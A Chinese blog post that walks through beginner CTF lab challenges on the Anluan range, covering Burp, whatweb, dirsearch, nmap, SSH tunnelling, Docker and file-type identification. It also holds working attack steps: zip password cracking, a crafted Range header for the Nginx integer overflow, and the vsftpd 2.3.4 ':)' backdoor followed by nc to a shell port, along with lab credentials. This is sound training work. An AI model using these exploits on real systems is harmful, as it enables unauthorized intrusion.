当前位置: 首页 > news >正文

安鸾学院靶场——安全基础

文章目录

    • 1、Burp抓包
    • 2、指纹识别
    • 3、压缩包解密
    • 4、Nginx整数溢出漏洞
    • 5、PHP代码基础
    • 6、linux基础命令
    • 7、Mysql数据库基础
    • 8、目录扫描
    • 9、端口扫描
    • 10、docker容器基础
    • 11、文件类型

1、Burp抓包

抓取http://47.100.220.113:8007/的返回包,可以拿到包含flag的txt文件。
在这里插入图片描述
访问http://47.100.220.113:8007/27726623fabee80870ab072b70178308.txt,获取flag。
在这里插入图片描述

2、指纹识别

使用whatweb进行指纹识别,命令whatweb http://47.100.220.113:8109/,获取flag。
在这里插入图片描述
whatweb -v http://47.100.220.113:8109/-v查看详细信息
在这里插入图片描述

3、压缩包解密

下载提供的flag.zip和wordlist.txt,使用fcrackzip工具破解zip密码,命令:

fcrackzip -D -p Wordlist.txt -u flag.zip
# -D:代表使用字典
# -p:指定字典
# -u:只显示破解出来的密码,其他错误的密码不显示出

在这里插入图片描述

4、Nginx整数溢出漏洞

Nginx整数溢出漏洞的影响版本:Nginx 0.5.6 – 1.13.2
注意两个响应头:

X-Proxy-Cache: HIT  # 表示命中
X-Proxy-Cache: MISS # 表示未命中

漏洞利用:

range1= 17208 # 请求demo.png,返回包大小为16585,要想向前读取数据,差值最好保持在600
range2= 0×8000000000000000-17208=9,223,372,036,854,767,331
Range: -range1,-range2 # 使用负数

在这里插入图片描述

5、PHP代码基础

直接使用system函数执行系统命令
在这里插入图片描述
在这里插入图片描述

6、linux基础命令

ssh远程连接命令:

ssh <usrname>@<ip> -p <port>
ssh test@47.100.220.113 -p 2233

在这里插入图片描述
find命令查询文件:

find / -name "*flag*" -type f 2>/dev/null # 在/目录下寻找文件名为*flag*的文件,不显示报错信息
flag{82782fd75008071871ad76e3a8b8794d}

九阴真经上卷找不到,似乎被删了,只有下卷。

7、Mysql数据库基础

手工ssh隧道转发

ssh -g -f -N -L 8888:mysql:3306 test@47.100.220.113 -p 2244 # 密码为:whalwl@wuhan
# -g:此选项允许远程主机连接到本地端口转发的绑定地址上。
# -f:此选项让 SSH 在后台运行,即以守护进程模式执行。这样可以在启动 SSH 连接后立即返回到命令提示符,而不会阻塞终端。
# -N:此选项指示 SSH 不要执行任何远程命令。通常,SSH 会尝试登录到远程主机并执行指定的命令,但在此情况下,我们只需要创建端口转发而不需要远程执行命令。
# -L 8888:mysql:3306:这是端口转发的设置部分。-L 后面的参数指定了本地端口、目标主机和目标端口的对应关系。
# 在本地主机上创建一个 SSH 连接,并将本地的 8888 端口转发到远程的 MySQL 服务器的 3306 端口。mysql -h127.0.0.1 -P8888 -utest -ptest

在这里插入图片描述

flag在whalwl数据库中。

Navicat连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8、目录扫描

命令:

python dirsearch.py -u http://47.100.220.113:8008/ -w dicc.txt -e php -t 1 -m head
# -u:指定域名
# -w:指定字典
# -e:指定扫描的文件拓展名
# -t:设置线程
# -m:设置请求方式,head请求只返回响应头,没有返回内容

在这里插入图片描述

看wp是由web.zip文件的,但是这里没有,所以搞不定了。

9、端口扫描

使用nmap进行端口扫描:

nmap -p 10021 -sV 47.100.220.113
# -p:指定端口
# -sV:探测服务版本

在这里插入图片描述

vsftpd 2.3.4存在一个经典的笑脸漏洞~

笑脸漏洞原理:在vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。

ftp 47.100.220.113 -P 10021 # ftp连接
kali:) # 用户名
kali # 密码nc 47.100.220.113 16200

在这里插入图片描述

10、docker容器基础

docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test # 拉取镜像
docker run -it registry.cn-shanghai.aliyuncs.com/whalwl/docker_test /bin/bash # 创建容器,并进入容器,退出会自动停止容器
find / -name "*fla*" -type f 2>/dev/null # 查找flag文件
cat /root/this_is_flag

在这里插入图片描述
在这里插入图片描述

11、文件类型

下载给的文件后进行解压

tar -zxvf flag.tar.gz # 解压出flag文件
file flag     # 识别file文件类型
unzip flag    # 解压,会得到五个flag文件

在这里插入图片描述

file flag-1 # 为JPEG图片文件,直接打开

在这里插入图片描述
在这里插入图片描述

file flag-2 # 为exe文件,linux下不能运行exe文件,需要放到windows下运行
# 注意改名为flag-2.exe

在这里插入图片描述

file flag-3 # 为ELF文件,linux下能直接运行
./flag-3

在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行

在这里插入图片描述
添加完后,根据icon,可以看出这是一个python打包成的exe程序。python解包
在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行
python pyinstxtractor.py flag-4.exe # 解包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

file flag-5 # 为JAR文件,直接用zip解压
unzip flag-5 

在这里插入图片描述
使用jd-gui对class文件反编译
在这里插入图片描述

相关文章:

  • Vivado时序报告之Datasheet详解
  • Mocha Pro 2024 v11.0.1 Mac版摄像机反求跟踪插件更新:优化AE/PR/OFX/达芬奇工作流程
  • 设置ingress的会话保持
  • Integrated Surface Dataset 全球气象站点小时数据获取方式
  • vue2+echarts:echarts在dialog弹框中不显示的解决方案
  • 使用Docker-Java监听Docker容器的信息
  • C++面向对象:多态性
  • C数据结构:排序
  • Mock数据
  • 第2章 Rust初体验5/8:match表达式和模式匹配:更富表达力:猜骰子冷热游戏
  • 181.二叉树:验证二叉树(力扣)
  • STM32CUBEIDE使用技巧
  • docker——基础知识
  • 08_第八章 微头条项目开发
  • Spring系统学习 - Bean的作用域
  • __proto__ 和 prototype的关系
  • 2017年终总结、随想
  • CAP理论的例子讲解
  • CentOS 7 防火墙操作
  • CentOS 7 修改主机名
  • dva中组件的懒加载
  • HomeBrew常规使用教程
  • mongo索引构建
  • nodejs实现webservice问题总结
  • React+TypeScript入门
  • Spring Boot快速入门(一):Hello Spring Boot
  • TiDB 源码阅读系列文章(十)Chunk 和执行框架简介
  • Vim 折腾记
  • 等保2.0 | 几维安全发布等保检测、等保加固专版 加速企业等保合规
  • 第十八天-企业应用架构模式-基本模式
  • 基于HAProxy的高性能缓存服务器nuster
  • 每天10道Java面试题,跟我走,offer有!
  • 扫描识别控件Dynamic Web TWAIN v12.2发布,改进SSL证书
  • 使用iElevator.js模拟segmentfault的文章标题导航
  • 数组的操作
  • 一个完整Java Web项目背后的密码
  • 用Node EJS写一个爬虫脚本每天定时给心爱的她发一封暖心邮件
  • ​批处理文件中的errorlevel用法
  • (007)XHTML文档之标题——h1~h6
  • (2024,Vision-LSTM,ViL,xLSTM,ViT,ViM,双向扫描)xLSTM 作为通用视觉骨干
  • (C++17) std算法之执行策略 execution
  • (C语言)共用体union的用法举例
  • (Qt) 默认QtWidget应用包含什么?
  • (八)Flask之app.route装饰器函数的参数
  • (二)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (附源码)小程序 交通违法举报系统 毕业设计 242045
  • (理论篇)httpmoudle和httphandler一览
  • (论文阅读笔记)Network planning with deep reinforcement learning
  • (四)事件系统
  • (一)Kafka 安全之使用 SASL 进行身份验证 —— JAAS 配置、SASL 配置
  • (原創) 物件導向與老子思想 (OO)
  • (转)Spring4.2.5+Hibernate4.3.11+Struts1.3.8集成方案一
  • .NET / MSBuild 扩展编译时什么时候用 BeforeTargets / AfterTargets 什么时候用 DependsOnTargets?
  • .net FrameWork简介,数组,枚举
  • .NET关于 跳过SSL中遇到的问题